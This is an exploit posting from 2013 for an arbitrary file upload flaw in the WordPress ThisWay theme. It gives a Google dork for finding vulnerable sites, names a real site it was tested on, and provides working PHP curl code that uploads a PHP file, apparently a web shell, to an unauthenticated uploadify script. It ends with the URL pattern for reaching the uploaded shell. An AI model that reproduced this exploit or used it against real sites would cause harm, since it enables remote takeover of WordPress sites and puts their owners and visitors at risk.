########################################################################################
#Exploit title: WordPress ThisWay theme - Arbitrary File Upload Vulnerability
#Author: Drac-101code
#Google Dork: inurl:"/wp-content/themes/ThisWay/"
#Date:22 November 2013
#Vendor Homepage: http://themeforest.net/
#Themes Link: http://www.mafiashare.net/download/themeforest-this-way-v12-wp-full-video-image-background/
#Tested on site : http://filmvideo.massart.edu/
########################################################################################

[+]EXPLOIT

<?php
$uploadfile="upl.php";
$ch = curl_init("http://[localcrot]/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

[+]SHELL ACCSES
http://[localcrot]/wp-content/uploads/[year]/[month]/[search your shell].php